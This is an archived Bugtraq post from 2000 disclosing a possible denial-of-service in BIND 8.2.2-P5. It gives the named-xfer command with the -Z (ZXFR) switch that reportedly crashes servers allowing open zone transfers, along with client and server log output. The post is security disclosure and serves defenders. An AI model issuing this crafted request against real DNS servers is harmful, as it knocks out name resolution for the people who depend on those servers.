[17551] in bugtraq
BIND 8.2.2-P5 Possible DOS
daemon@ATHENA.MIT.EDU (Fabio Pietrosanti (naif))
Wed Nov 8 12:50:59 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.30.0011071339510.29294-100000@naif.inet.it>
Date: Tue, 7 Nov 2000 13:40:49 +0100
Reply-To: naif@inet.it
From: "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure
execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind 8.2.2-P5 .
By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define it with #define BIND_ZXFR
so it will refuse any ZXFR transfer, because it doesn't support it.
But now what appens? Look here...
################################
zone to transfer: zone.pippo.com
dns server: dns.pippo.com 192.168.1.1
me: naif.gatesux.com 10.10.10.10
I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR.
dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone
could ask him for *.zone.pippo.com ...
<naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
On the server's log:
Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
Then the server "*** CRASHED ***" .
I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos)
and bind-9.0.0 has no support for ZXFR .
<naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l
234
<naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l
0
A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable...
naif
naif@itapac.net
